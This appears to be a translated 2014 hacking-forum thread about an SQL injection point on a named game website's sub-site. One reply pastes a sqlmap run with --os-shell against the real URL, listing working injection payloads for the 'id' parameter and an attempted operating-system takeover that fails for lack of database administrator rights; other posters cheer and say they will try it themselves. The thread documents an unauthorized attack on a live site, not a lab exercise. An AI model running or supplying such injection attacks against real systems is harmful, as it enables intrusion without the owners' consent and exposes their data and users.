nick2011 posted on 2014-11-15 11:42:57

Mm, not bad vuo

now posted on 2014-11-15 12:15:38

How impressive = =!

C4r1st posted on 2014-11-15 12:19:30

Was this posted in the wrong board?

now posted on 2014-11-15 12:38:55

It's not root, so you can't get a damn thing

root@kali:~# sqlmap -u http://ls.gamefy.cn/detail.php?id=13 --os-shell

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:40:57

resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13 AND 4788=4788

    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: id=-4963 UNION ALL SELECT 48,48,48,48,48,48,48,48,48,CONCAT(0x7162676f71,0x414144674654756a6c51,0x71666c6c71),48,48,48,48,48,48,48,48,48#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=13; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=13 AND SLEEP(5)
---
the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
fingerprinting the back-end DBMS operating system
the back-end DBMS operating system is Linux
time-based comparison requires larger statistical model, please wait..............................
it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
testing if current user is DBA
fetching current user
in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
functionality requested probably does not work because the curent session user is not a database administrator
what is the back-end database management system architecture?
32-bit (default)
64-bit
>
checking if UDF 'sys_eval' already exist
checking if UDF 'sys_exec' already exist
detecting back-end DBMS version from its banner
retrieving MySQL base directory absolute path
it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail

乐生乐道 posted on 2014-11-15 12:54:24

:D Let's see how it was broken through

Lzzh posted on 2014-11-15 12:55:51

evil, you have my support...

ghost97 posted on 2014-11-15 13:55:12

Let me take a look at the injection point.

zhoujian017 posted on 2014-11-15 14:00:50

Going to try it right away

xenon posted on 2014-11-15 14:03:40

Support, bumping for the OP

契约 posted on 2014-11-15 14:47:58

Don't tell me it doesn't even have DB privileges
View full version: An injection point on a 游戏风云 sub-site